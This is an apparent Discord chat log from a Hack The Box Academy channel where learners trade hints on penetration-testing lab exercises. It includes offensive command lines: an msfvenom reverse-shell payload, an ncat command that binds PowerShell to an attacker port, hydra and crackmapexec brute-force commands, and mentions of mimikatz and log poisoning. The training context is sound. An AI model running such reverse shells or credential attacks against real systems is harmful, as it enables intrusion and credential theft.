#modules

nmap wont give you the flag, try doing some manual digging into the services nmap told you about

ok i will try thx

i did struggle with that one last night 😦

eventually i got it accidentally :p

yeah its tricky

im now stuck again a few questions later on the IDS Evasion Medium Lab 😦

i feel like i have ran into issues way too early in the path 😦 but anyone have any hints for getting dns version in the Network Enumeration with NMAP - IDS/IPS Evasion - Medium

a couple of the commands i have tried have given me a "version" but it looks more like an application name than a version number (and submit didnt work with any variations of the value i got)
sudo nmap -v -sV --version-all -p 53 $TARGET -sSU --source-port 53
sudo nmap -v -sV --version-all -p 53 $TARGET -sSU --source-port 53 --disable-arp-ping --packet-trace
i also tried a couple of things without nmap that i found on google
dig CH TXT bind.version @$TARGET
dig +nsid CH TXT id.server @$TARGET
but neither of those gave anything useful in the response

i also tried to just nc / telnet to target port 53 but neither of those gave anything at all

i feel like my issue is knowing how to get a dns server version rather than evading the detection

Thx for the help!

Can I get any help about #PIVOTING, TUNNELING, AND PORT FORWARDING skills assessment?

Solved, but now I have another problem, that when I try to run powerview.ps1 or mimikatz.exe or rubeus, I have the following error message: "The file or directory is corrupted and unreadable", any idea how to continue in skills assessment active directory part 1? q2

dm me, if you want.

hello quick question regarding Dynamic Port Forwarding with SSH and SOCKS tunneling

for the question 2, by having a pivot to the internal network

shouldn't the command be like this?:

is anyone available to dm for the intro to networking module? I don't know what i'm doing wrong in the question that asks me to split a network into 4 subnets and submit the network address of the 3rd subnet

in File Transfers/Catching Files over HTTP/S, does anyone have no problem with setting up nginx to accept PUT? I followed the instructions in the section using both Pwnbox and my Kali, but I do not seem to get it to work. Any suggestion? Thank you.

Oh I ended up finding the flag. nmap gave me the results but I was not scanningt he right ports the first time which is why I didn't see it. I am wondering though how you got the flag from the service without nmap? I have some ideas but the commands I tried to run against that service to get the flag did not work?

unless im getting mixed up with a different challenge when i used netcat to connect to one of the ports it gave me the flag

oh wait. i accidentally submit for the next section 🤦‍♂️

welp if File Uploads did anything, it was ingrain %20%2F into my brain🙂

Orbit Challenge decode hint? 😮

if you’re talking about the Cyber Apocalypse…

1. Hints aren’t allowed
2. #1072163815296356382

If it’s a challenge on the main platform
#challenges

Yeah I'm still not getting the flag . I connected to all the ports with nc ?

lol, yeah after many modules I might start correctly spelling inlanefrieght

managed to get past this at last, turned out that nmap was silently failing to bind to port 53 on my kali box and was ignoring the source port param 😦

So if you use nc you need to be patient

I've had it take up to like 20 seconds to a minute to get the flag

Also mind the IPS/IDS on the target.

Hey are you still around? Mind if I P.M. you on this?

Oh. Yeah that was it. Just had to wait a bit 🤦‍♂️

2 hours of suffering due to 1 min waiting

So I'm working on the Meterpreter Tunneling & Port Forwarding module. Exercise is "by the book" so to speak. Got the meterpreter shell alright, got the internal network range, ran the meterpreter ping_sweep module and getting all these errors. I've not found anything on Google yet. I can do a ping sweep using the command line and get results just fine. Anyone know how to fix this issue with metasploit?

/usr/share/metasploit-framework/lib/rex/logging/log_dispatcher.rb:90:in synchronize': can't be called from trap context (ThreadError) from /usr/share/metasploit-framework/lib/rex/logging/log_dispatcher.rb:90:in log'
from /usr/share/metasploit-framework/lib/rex/logging/log_dispatcher.rb:172:in elog' from /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:159:in rescue in block in finalize'
from /usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:156:in block in finalize' from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:410:in type?'
from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:599:in block in get_tlvs' from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:598:in each'
from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:598:in get_tlvs' from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:654:in get_tlv'
from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:668:in get_tlv_value' from /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet.rb:1042:in method'
from /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb:37:in `request_handler'

I'm on the medium lab in Password Attacks. I'm having trouble just getting into this machine to look around. I've tried hydra, metasploit with the auxiliary scanner for smb login, and crackmapexec. None of these have worked there is an ssh service and smb service running on this machine. Any hints would be very helpful.

have you tried using crackmapexec?

Yes, and I get a strange response. I get the shares, but it says the password is just a single character. When I try to use it, it of course says it's wrong. It also happens to be the first character in the password list that I'm using. It's like crackmapexec isn't looking through the entire list and just saying the very first one at the top of the list is the correct password. I haven't seen it do that before.

Oops.. my bad man, i saw you said crackmap 😂…. That is strange, hmm

What does your command look like

can someone help me on AD Skill Assessment I???? I'm still on the first few steps bc the shell crashes every time an idk how to get around it so I'm looking for some advice... ||I already cracked the hash I just need help pivoting.. everything I try crashes the shell||

crackmapexec smb IP_Address -u user_name (found using metasploit) -p mut_password.list --share

That's because it has basic protection for users, it allows any user/password combo to 'see' it

Got it, so I need to use something else to find the password of the user. I'll just have to keep digging.

I can't remember what all I used

Can you provide more details?

can I dm?

nop

||I got the credentials for the first user but I can't hop... I've tried using Enter-PSSession, creating an RDP user, and even putting some pivoting tools so I don't have to work on this shell but everything crashes the shell or timesout... even a ping sweep to see where other shit is|| and please don't say restart the lab bc I've done that like 10 times now

@opaque niche

From what I understand, you have the credentials of s**_**, if you did the ping sweep correctly, you could pivot with netsh to the user

ping sweep crashes the rev shell... and when doing it from the webshell it errors out saying unexpected token '$(' even though I copy and paste it from the ping sweep section

find another way to ping sweep, maybe with metasploit or use another way to create the rev shell

||1..254 | % {"172.16.6.$($): $(Test-Connection -count 1 -comp 172.16.6.$($) -quiet)"}|| right?|| I have _ after the $ but discord is treating them as formats||

I think I used something similar, try another more stable rev shell

wdym more stable

I did a base64 powershell one from revshells

one that doesn't crash the ping sweep, I think I used nishang's powershell

I didn't understand how decoy scan is working. If you send a fake return ip address in a request, how does it figure out to respond back to your original IP?

is it possible for a server with both imap and pop3 setup for each service to have it's own credentials or are they the same?

Hi, I need help. I created msfvenom payload msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.15.44 -f elf -o backupjob LPORT=8080 and I launched in on target machine, but it always returning this error ```
ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)

Okay nvm, it'd be payload internal error. I used stageless payload this time and it works.

I'm getting a really weird issue on the Password Attacks Module - Networks Services Questions. for the box, using nmap, I found NFS to be open. Not sure if this is the way in, but trying to mount NFS, gives the permissions to the mounted folder to user '4294967294' and I'm unable to access it locally. Been at this for a few hours, any idea what this is?? If this isn't the way in let me know and I'll abandon this but I quicky tried accessing other open ports anonymously and get ACCESS DENIED everywhere... EDIT: I went back to the Footprinting Module that covered this method and port and was able to access right away. The version over there was 4.2, the version for this module/question is 3 - would that have anything to do with it?

The difference here is easy to see. If you stop on the mountain and do not climb any further up, you will stay on the same spot. Look at the following mathematical example to see the difference in numbers:

(1.00)365 = 1.00
(1.01)365 = 37.7

Here we can already see the enormous difference, how much it makes, even if we only increase our performance by 1% per day. If we want to record our progress and write it down to look back and see how far we have already gone, you can create two lists.

List No. 1
On the first list, you write down the current date and everything you know about your desired topic with all your skills with an estimated scale of 1-10. Try to make it as detailed as possible. The more detailed it is, the clearer the difference will be for you to see later. As soon as you think this list is ready, put it down or save it in a way that you will have access to it even after one year.

List No. 2
The second list is written continuously. This means that as soon as you have familiarized yourself with a topic and you have learned something new for yourself, you will add it to this list. Try to learn every day, even if it takes only 10 minutes. If you want to do it more scientifically to get even better results, document the calendar weeks.

We will be amazed to see the progress we have made during this time. Above all, it will become evident to us why no one else but ourselves can tell if we have made good progress.

Questions
Answer the question(s) below to complete this Section and earn cubes!

• 10 To get the cubes back from this module, answer the following question. What is the difference between the two numbers of the learning progress mentioned above? Could anyone help me with this issue?

What does the word difference mean... This is a reading comprehension question

Ok I got the answer to this. The decoy scan sends your ip address amongst random ip addresses. So you are not totally anonymous, it's just harder to tell which one is the real ip. It has to send your real ip otherwsie there is no way to get a response back.

hy where is the first welcome task's flag??

a bit confused on the nmap hard box. is there another service i am supposed to be looking for, or is it the domain service but with more specific scan settings?

can someone give me a hint on password attacks and then the linux credentials hunting

nvm i tried harder

got it

??? there should be plenty of ports open, also don't forget UDP.

Also mind IDS/IPS, which blocks the request at some time.

Anyone for httpattacks ? 🙂

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer

how can do this prolem

problem*

I have tried nslookup and dig but no result

add inlanefreight.htb in /etc/hosts

then try this

okk

@ocean beacon did it work then?

how to overwrite the change in /etc/hosts

sudo nano /etc/hosts (yeah, nano, suck it up)

Make the change, CTRL+X to exit / save

not working

** server can't find inlanefreight.htb: NXDOMAIN
this is the result..

can you help me with this above problem

did you also add the IP?

yaa

anyone for skill assessment I on AD??? ||I can't pivot past the first box... I've tried basic powershell base64 rev shell from revshells, Nishang Reverse Shell, PowerCat, I even tried using Empire, but they all either don't work and the command fails or won't allow me to do a ping sweep or anything||

hi all, I am trying to ssh to the target machine after dialing the openvpn from my kali machine but i am not able to get the resposne prompt for entering the password.

instead getting the following log in my ssh connection

i can ping and also do ssh

can someone help what i am doing wrong

What module are you doing would help us help you better

debug1: Local version string SSH-2.0-OpenSSH_9.0p1 Debian-1+b2
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
debug1: compat_banner: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 10.129.140.241:22 as 'htb-student'
debug1: load_hostkeys: fopen /root/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
Connection closed by 10.129.140.241 port 22

Also putting your error log in a code block

You can't because your HTB account isn't linked on discord, so it will flag and delete the message

Hi macielee,

go it resolved, its a bug in ubuntu machine

nic card

i used this command to fix it

ifconfig wlan0 mtu 1200

wlan0=tun0,

i am working on linux fundamentals

so wanted to connected to the remote machine via ssh through my own kali machine

At least you resolved it

** server can't find inlanefreight.htb: NXDOMAIN

Standard MTU in most use cases should be 1500

haha. Still pasting it here if someone needs it. 🙂

how can I solve this problem

Dig ns inlanefreight.htb @<spawned IP> if you have it in your /etc/hosts file you may get issues

Or

nslookup inlanefreight.htb <spawned-ip>

let me try once

I forget with nslookup if you need the @ for the ip

i tried the nslookup but no result

Again if you have the IP in your /etc/hosts you may run into issues

I am not able find the nameserver

for an exercise i need to login with rdp but i get this error message

Copy/paste the command you're trying @ocean beacon

nslookup -type=NS inlanefreight.htb@10.129.42.195

Try putting the password in quotes

Need help with Password Attacks Module - Networks Services Questions. Is this just BF'ing until you find the right creds?

Put a space between inlanefreight.htb and the @

which one

ye didnt work

Try using a different RDP service then like Remmina

nvm i did work

If you're using parrot it's preinstalled

It's reliability is much higher

used the wrong quotes

Mood

htb is the biggest sanity checker

@grand harbor the 4 questions each pertain to finding the username for a corresponding port (winrm, ssh, RDP) and BF'ing the password. But I don't even have a username. Am I just to BF that as well or do I need to do something with NFS port?

hmm

wait

let me check

@grand harbor thanks!

no result

did you download the recources??

Is inlanefreight.htb in your /etc/hosts file? @ocean beacon

yes

Remove it from there and try again

okk

no result

Im out of ideas then bc I don't recall having this many issues myself

What module is this for?

@ocean beacon are you connected to the vpn??

^

could someone help me with pivoting in the AD skill assessment please

no

Heh

ye then it wont work

You need to br connected

To access any spawned ips

@grand harbor ugh omg no.. didn't even see it. Thanks!

my college lan ..don't let connect to vpn

Can you try the TCP option?

use the pwnbox instance on the page

That goes over port 443

Or that

I am using pwnbox

Oh

Aaand back to square one 😦

Pwnbox is using the vpn

Btw

Give me a sec, might be able to hop on and help

no

I don't think so

not having this fight with someone again about pwnbox and VPN

what should do now

nw

I*

Hold on a sec @ocean beacon , I might be able to help

okk

^ it's probably something simple

And we're just silly

Hi from school

might be

Ok @ocean beacon, with your permission, I'd like to hop on to your Pwnbox instance and take a look. If you're ok with that, could you click on the "Interact" button, and then send me the link that opens in DM?

FYI I'm HTB staff, CTO/Director/etc, you can trust me

I know I know.. that's what a bad guy would say 😆

i trust you

Try the nslookup command again but without the @ in front of the IP

should I just send the ip or somthing

Probably best to dm that

Where it says "My Workstation", there will be a button that says "Interact". Click on that, and then send me in DM the link that opens

okk

nslookup was missing an argument to widen the search outside of the scope of just A records

got damn this password attacks module is so huge

https://tenor.com/view/sanity-pills-ahs-violet-harmon-gif-26125501

could someone help with me pivoting in ad skill assessment?

please☹️ I've been stuck on this for two days now bc none of my techniques work

Sorry cant help you @rustic sage as I havent done it yet. But I recommend youtube, google some writeup, or make easier versions on tryhackme to learn what needs to be done, it has helped me loads with HTB.

You could also make a post in #1024429874246590575

is this not the place to ask about academy modules?

Yea but more people read community help

Just trying to save you some time 🙂

Especially now when I think a lot of people are busy with the CTF

Hey buddies. Anyone have issues with the Attacking Common Apps > Splunk Enum part? Didnt see anything in the community about it. put the ip and port that the splunk service is listening on, but keep giving me "connection was reset" message in the browser. Thanks.

https?

mysql and mssql no valid password found with f__

and cant fully brute force mysql as its blocked for many connection errors

anyone able to help me with this questionm

Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

since you are root, unleash the katz lol ; )

no clue how to do it in linux

Attacking Common Services - Easy

Found a user F.... using smtp-enum
tried brute forcing with resource password list to all the services

hydra -l 'f....' -P pws.list -f 10.129.16.179 smtp

If anyone needs any help with (or wants to compare notes with) the AD Attacks Skills Assessment Part 1, I just finished it. But I had to do something unusual to get one of the tools to work. Would love to pick someone else's brain about that.

may help me with this?

Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

its the linux password attacjs'

im hard stuck

or im thinking to difficult

you could go over the linux ptT section for some aid or feel free to send a DM

i am in the linux ptd section

and i have done all steps ( i think)

but cant find the kerberos ticket

for linux01

dont overthink, just go over the last parts of the section and note things only the root or admin users can do

i got it..

I will give you a hint, when I'm back on my machine 🙂

anyone interested in giving a hint on how to upgrade my shell for the ATTACKING COMMON SERVICES - EASY. ?

thank you.. I have finished medium and hard. this is the only one left

skill assessment

@dull thunder can i dm you?

please do

hello i have a question about the skill assessment Web Services & API Attacks 🙂

how does spoof source ip of scan work? in the examples in the module, they give some ip addresses that don't correspond to my actual vm or the target vm so i have no idea what all the IP's they are putting in are

They way they show it in the example is sudo nmap 10.129.23.11 -n -Pn -p 445 -O -S 10.129.23.200 -e tun0

so that looks like be sudo nmap <target ip> ... -S <some ip on target network> but i get 0 hosts up as result?

hi all, I want to discuss about the solution of** Windows Privilege Escalation Skills Assessment - Part I**. I finished the 4 questions but want to know if is this the correct way as it was a bit weird. Please DM me. Thanks

yea this is not the area for this

....

man, wtf ...

So creepy

Just.. just no

Oh k

Is there any thread that I can get help?

Sry about that

Somewhere that's not here

https://tenor.com/view/facepalm-gif-24250855

Or maybe, just don't

Hello, i have a question regarding the introduction module. I have an interactive section were i have a docker target and i have to open firefox and paste the target url and answer to the following question: What is the proof text displayed in the Target website you browsed? The problem is that the site doesn't work...

you need to include the port

that was given, when you spawned the target

well i included the port

feel free to reset it

i already done that multiple times

still have the same problem

what is the targets address

this also happens when i access other sites, like google.com

178.62.6.17:32572

so the question that you need to ask yourself is - do you have internet in your vm

yes, i opened the terminal, and pinged 8.8.8.8 and it works

to other sites however it doesn't work

check if you have foxyproxy enabled to proxy traffic to burp or other apps

it's disabled

If you reset it, does the IP / Port actually change? Any error come up?

Because I can't reach that container either

yes it does change

Ok, what is it now?

still time out

Right, but what's the IP / Port?

178.62.6.17:32572

That's the same..

Use this IP - 68.183.37.10:30313

i spawned another one

should i use it?

or this?

whichever loads

it works now

thx

Hi! I have a (maybe dumb) question. I'm going through the "Getting Started" Module, i.e. "Nibbles- Web Footprinting" section. Very early on, they find a /nibbleblog/ directory. Shouldn't it be also listed via gobuster against the root of the web app? (spoil : it's not but I don't get why)

if that word is in the wordlist, yeah

helP!!

<@&861185840277487616>

+rep @river skiff

bruh

roblox moderater detected

thanks

User 834700673362034742 has been banned permanently.

😮

what happen

In web attacks, advanced file disclosure, I've obtained the flag using the error method but I've floundered for a day trying to get the CDATA method to work. Anyone willing to dm me a nudge?

In the Attacking Enterprise Network Module, page 3 External Information Gathering-- I am trying to follow along and using ffuf I am getting responses I don't understand. Using the correct IP of the lab I ran this curl -s -I http://10.129.203.101 -H "HOST: defnotvalid.inlanefreight.local" | grep "Content-Length:" to get the length of an invalid vhost. from there I run ffuf -w namelist.txt:FUZZ -u http://10.129.203.101/ -H 'Host:FUZZ.inlanefreight.local' -fs 15157 Doing this I got thousand of status 200 responses most of which if I add to my /etc/hosts file it just takes me to the home page for inlanefreight.local. I feel like I am missing something here to do a proper filter on ffuf. If that makes any sense and someone could help me see what I am doing wrong, it would be greatly appreciated.

is domain=. a wild card for domain? what does the dot signify

I don't think I am understanding fully what your asking, I did notice most of those responses have a size of 0 so I added -fs 15157,0 to filter those out, re-running it now.

What is the ObjectAceType of the first right that the forend user has over the GPO Management Group? in AD module...

in the attacking common services module, it talks about using a credential file... and in the file it has domain=.

I tried the classic ```$sid = Convert-NameToSid "forend"

Then
Get-DomainObjectACL -ResolveGUIDs -Identify * | ? {$_.SecurityIdentifier -eq $sid} -Verbose```

this doesn't show anything r egarding the GPO group

?

idkwym

.

@sterile hawk

haha my bad... i think we posted at the same time so you thought i was answering your question

@finite marsh This isn't for sharing hacks/cheats

👍

#cwes message

i just finished the Passwords Attack Hard lab, and I have been trying to clear this mount off but it will not disappear...any help would be appreciated...everything that i did to create the folder, etc. i have removed...i even tried umounting the loop0p2 but nothing...the drive is: 117 MB Encrypted

did you add anything into /etc/fstab to mount it?

hmm let me check

i just see this

/swapfile none swap defaults 0 0```

did you try a reboot?

yes

ohh maybe because it was encrypted?

ayyeee... i dont know...i just restarted it again and its gone...weird..

good enough. I had to mount that one in windows, just curious how did you manage to mount it in linux?

i had to google it .... i used dislocker

good to know, thanks!

by far that module was the hardest i have encountered with HTB academy

it uses a different file than /etc/fstab for encyption, i am drawing a blank on which file however... /etc/cyptab or something like that.

Yeah that one kicked my ass for sure

i had to go back through it twice just to write detailed steps so i would know haha

it was /etc/crypttab for encrypted mounts, FYI

has anyone run into an issue where with firefox where youll type in http://IP and it redirects to https://IP all of the sudden?

cant access the assessment page because of this.

ive changed all settings i could find to turn that off. but it didnt seem to take affect

Not that I recall@analog tendon i could have swore I saw a setting regarding automatic http/s when url is typed

yea i found that setting. it was switched to false

I was trying to figure out why my firefox doesnt assume http when i browse to anything.htb. It just goes to google

idk it just magically stopped redirecting now

For burpsuite and htb vhosts ?

for just about anywebsite i put into firefox

i found this solution previously somewhere which worked in firefox
about:config
dom.security.https_first_pbm false
dom.security.https_only_mode_pbm false

after that all .htb works and doesn't upgrade to https error

oh i wasnt doing any .htb sites. i was just trying to get to the IP site. XSS assessment page but it wouldnt let me connect because it would always redirect to https

Did you solve this?

Anyone help me with ad skill assessment 1? ||I uploaded a ncat from nmap website on the site but every type I execute "C:\ncat.exe" -e powershell [attack] [port] it results in a "Server Error in '/' Application.||

Sometimes redirect forces it to the x.htb site which may also "upgrade" it to https

@rancid mulch @grand harbor I'm stuck on this question: "What is the admin email address?" from the IMAP / POP3 footprinting section? I found one email address but it is incorrect. I tried enumerating ports 110,143,993 and 995 and using nmap discovery script and -sC. Any hints?

need read the email. the content in the module material covers this

Why are you pinging random people?

They asked the same question recently and figured it out so I decided to ping them for help

That's not proper etiquette; in discord you can reply to a message:: you can just reply to their message with the question and say "hey did you get this figured out yet?". Not to mention - according to the timestamp that was a week ago lol and Alaynn's question was 2 and a half a weeks ago... so best to just ask and not worry.

But something that will help you with anything regarding smtp/imap/pop3 is to use an email client to login with any credentials you find so you don't even need to remember the syntax for commands :)

You ever get this answered?

ok

all right, thanks i'll try that 👍🏻

Footprinting DNS Question 5 referring to X.X.X.203. I cannot find the FQDN for this IP. I’ve done a zone transfer on the subdomain and all of its subdomains but cannot not find this IP at all. Any help?

subdomains of subdomains; also you might need to try a more fierce wordlist for that one

No. 😦

F

Hey there. I'm working on the wireless section of the hashcat module and am a bit confused. When you use cap2hccapx to attcked the MIC, it seems to copy the 4-way handshake into the output file, not output hashes for hashcat to crack. Am I missing something? The section seems to go straight to using hashcat without actually creating a file with hashes.

No joy on the domain or subdomain

use something like dnsenum

but it is only a t2 subdomain t1 being xxx.inlanefreight.htb

so you don't have to dive deep

Got it thanks for the tip

if you are doing manual: ||d*.inlanefeight.htb|| is an additional hint :)

So I'm totally new. I'm trying to get through "Starting Point". I have connected to the vpn and everything went green. However, back on the tasks screen it still says I have completed 0 tasks and can't move onto the 2nd task. Not sure what I'm doing wrong here.

Are you referring to the #starting-point set of boxes on app.hackthebox.com?

:)

yes

then that channel is where you should look; this is for modules on the academy.hackthebox.com site :)

https://tenor.com/view/ban-button-keyboard-press-the-ban-button-gif-16387934

<@&861185840277487616>

already on it

Ty

poggies

:)

thanks

looks like they hit all the academy tabs aka the noob trap channels

time to spend 12+ hours redoing my notes up until AD enumeration because I got lazy :)

@fathom pendant I dm you

I'm good dude it's mostly hyperbole

I'm new to hack the box and I have a question. As i go through the challenges should I studying along with the academy or something? I don't know what I should be doing. For example I don't know how to access the WorkShare disk in the SMB exercise.

If you're talking about the challenges on the main site (app.hackthebox.com) #challenges is the place to ask and look for your info

alright thanks

Any chance anyone knows what I'm talking about?

Hey, can someone help me pls, AD Enumeration & Attacks - Skills Assessment Part II
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I ran Lazagne and I got some hashes, but I cant crack it, so I tried a pass the hash but it didn't work

No I'm not there yet. But I understand the 'Is anyone listening' scenario. Good luck.

Thanks! I completed the rest of the module, including the skill assessment, so feel free to PM me if you're working on the module and need help. This account is only for HTB, but I try to check it.

Would anyone be kind enough to tell me why a reverse shell connection on netcat drop after it was connected?
For further info I am in the Windows Privilege Escalation - Weak Permissions and replaced one of the exe file, however, upon triggering the file it connects to my listener but then drops shortly after

There is a hidden webpage at http://faculty.academy.htb:PORT/courses/linux-security.php7
Why does this command identify it:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://faculty.academy.htb:32314/courses/FUZZ.php7 -v -ic
But this command doesn't:
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://faculty.academy.htb:32314/courses/FUZZ -e php7 -v -ic

Shouldn't they do the same thing?

you're adding .php7 in the end.. if the file name is for example index.php7 then only when u can provide the correct extension you will get it in your output..

But the second command has the -e flag with the php7 extension specified, so shouldn't the second command at some point try /courses/linux-security.php7 as well?

you have to use .php7 with -e flag

don't forget the period

ahhh thank you

Did you solve it??

Yo @everyone🙋, im new here

#rules and #welcome :) this channel is about discussing the modules found on https://academy.hackthebox.com ; in order to access other channels that you won't be able to see right now you can follow the instructions in #welcome to do so

if you don't know where to start at all you can always try

sorry bot broken

I was trying to have it do a thing

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I don't mean to bother anyone with some "tell me how to start hacking", i'm already doing that right now and putting the work in but I am stumped right now and don't know where to ask this, in particular which discord server however I'll ask here in the chance that maybe somebody could help me

so basically I'm trying to use proxychains on kali but regardless of what I do, the connection keeps timing out

I've tried plenty of different free proxies

Is this related to an academy module?

perhaps this may not be the right discord server so excuse me on that, if somebody could lend me a hand and direct me to a proper discord server for this type of stuff

no this is kali vm

I'd recommend reading #rules and #welcome or asking your question in #1024429874246590575

this channel is for questions regarding the modules found at https://academy.hackthebox.com

oh okay

I'd like to talk to a person in real time about this stuff considering that the community help channel looks like a forum, was trying to find a particular general hacking discord server with a chat that involves guidance from others on particular issues, do you know of any discord servers that fit that purpose? @fathom pendant

No; especially as I do not know the purpose of your query (legal or illegal, sanctioned, etc)

I'm trying to play with proxychains as a form of privacy whenever I browse anything

seeing how it works

nothing illegal

and yes #1024429874246590575 is a forum-space and is reliant on the kindness of others - you may get help, you may not. I do not know of any servers that are "real-time" assistance to issues

that aren't dedicated servers for a specific service

by real time I just mean active chats and not forums where you have to wait for a reply lol

it's still a shot in the dark brother :)

Fair enough

but better to ask and potentially get an answer than to never get an answer to a question that you don't ask

Yeah I get what you mean

but as stated: that question is not for this channel- so GL

Ok

👏🏻

Hi stuck on skills assesment from using web proxies, all the payloads are giving me the same response, anoyne knows why this happen?

Hi

which question? it has 4

The third question

This one?

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above.

hello all i am having issues with the skills assessment -File Inclusion I am having issues with poisoning logs sometimes when i send "posion" via user-agent it will return in the response, but as soon as i try to send php code + cmd commands in the url i get no response and it seems like the server is frozen. I have been stuck here for hours and well any help or hints are greatly appreciate thx

Same is happening with me

hi

am facing this issue

Module: Server Side Attacks
Section: SSRF Exploitation Example
Stuck for a couple days. I can not obtain an interactive shell. Can someone DM me please?

dm me where u r stuck?

Ey guys ,on the network enumeration with nmap ,which ip u using cuz all mine refusing

which ip are you using? and is the vpn connected?

10.129.2.18

what error are you getting and is the vpn connected?

It is connected, it just says all ports are scanned it it won't show nothing no matter which flags i use

youre in the enumeration section?

whats the command you are using?

or a screenshot 🙂

Used the -A ,-O , -PE ,--disable-arp-ping

Only the ttl part is confusing me

and youre scanning all ports?

Yes

-sS and -sU

yes. unfortunately poisoning logs is very risky and you can ruin the whole exploitation path... I think it took me 4-5 attempts before I got it working. I don't know a potential fix so you'll juts have to reset and try again

so technically i am doing it right just getting extremely unlucky right lol?

I'm not sure what you're executing but tbh you're probably right and just unlucky😅 that section took me a bit of time as well

im using burp to send the php code in the user agent field and adding the &cmd=id in the url after the .log file

you can dm me and I can check over your PHP code, but like I said most likely just unlucky

hi has anyone solved Password Attack Skill Assessment medium? I want to ask a doubt?

Hi all! Can someone help me with Firewall and IDS/IPS Evasion - Medium Lab (module of Basic Toolset)?

information gathering

perform a curl request to the target website asking for a JSON output as this is more manageable for us to process

curl -s "https://crt.sh/?q=${var}&outp=json" | jq -r '.[]
| "\n(.name_value)\n(.common_name)"' | sort u > "${var}_crt.sh.txt"
sort: cannot read: u: No such file or directory
parse error: Invalid numeric literal at line 1, column 7

this command line gives somes errors, can some help me with this

Can u dm me a screenshot of urs

var is environment variable, it could be any website

What is it you're having issues with?

I think I found clearly the DNS server version, but HTB is not accepting that answer...

Can I DM anyone about the MIME filter bypass on File upload attacks?

Never mind, I found it!

how can i mass dm and mass report someone?

you dont, just msg mods with evidence of whats going on

could someone help with question 6 "Submit this user's cleartext password." of ad skill assessment 1? ||I dumped LSASS and use mimikatz sekurlsa::logonpasswords but nothing is in plaintext... I tried cracking the hash for the user but nothing comes up with rockyou||

Can someone help me with Windows Privilege Escalation Miscellaneous Techniques module please?
I am able to escalate cli/ps to nt authority/system account.

I retrieved hashes using SAM and SYSTEM hives, tried to crack with JTR and hashcat, not all of them are cracked.
I used mimikatz also.
I was searching system using findstr.

I found some flags/passwords using techniques above but none of them is correct...

Please, tell me what should I focus on, which exact lesson can help me solve it or which techniques should I use to get that pass. I spent almost whole day on that task and no idea how to progress. I'd appreciate any help.

EDIT:
SOLVED. Omg that was really silly. Just study carefully this lesson 🙂

try something from impacket can also dm me if needed

are you still stuck?

I can try to help you 🙂

Yeah i got the ports but no way of finding the operating system

dm me the module you're on, section, what you've tried

Network enumeration with nmap, Host discovery

send me a dm @slate shell if you're getting errors screenshots will help

what is the best channel to ask for general help, not related to modules

#1024429874246590575

Hey can someone help me with "Firewall and IDS/IPS Evasion - Hard Lab" in the Network Enumeration With Nmap. I am stuck with the Question:
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. I already tried running TCP und UDP scans. Did a full scan of all ports. Also did Version Scans. Tried also to do some stealthy scans. I don't really know where I should find the flag. I also tried banner grabbing on all the ports found. One port on TCP seems interesting (not usual) but when I try to connect to it with netcat I get a timeout. Anyone can give me a hint into the right direction ?

It is an unusual port: if you are having issues connecting to it, potentially the source of your port issues is the problem, reread the ids/IPS evasion section carefully

got it thanks

haha

❤️

<3

Not as yet. I was advised to login with an email client using credentials i've found to read the email. I'm going to try it with the email that I found

Need some hints on how to decode the base64 encode of the kdbx file I found in the password attacks hard lab. I tried using the base64decode.org site, but when I try using keepass2john against it, I get an error saying Unknown format: File signature invalid.

so I'm understanding you correctly, you found a kdbx file, you base64 encoded it, and now you're base64 decoding it to get it on our attack box?

Yes, essentially. So, I decode it and then try to pass it through keepass2john and that's when I get the error.

do you know how to use the commands

before trying to decode it, check the md5 hash or sha hash to confirm the file is unchanged.

if you've already done File Transfers I believe it talks about base64 not being too reliable for bigger files. Therefore you should try another method 🙂

Okay, will do. Thank you!

The IMAP commands? No, but I'm going to reread the module and look more carefully at the examples

bookmark this 😉 https://donsutherland.org/crib/imap

Thank you

You need to use internet

I started researching it last night but was tired so I decided to try again tonight

Its a pain in the aas

Ass

That module

Oh, i just have the last two questions to complete

but i feel like i need a lot of practice with this

Question:

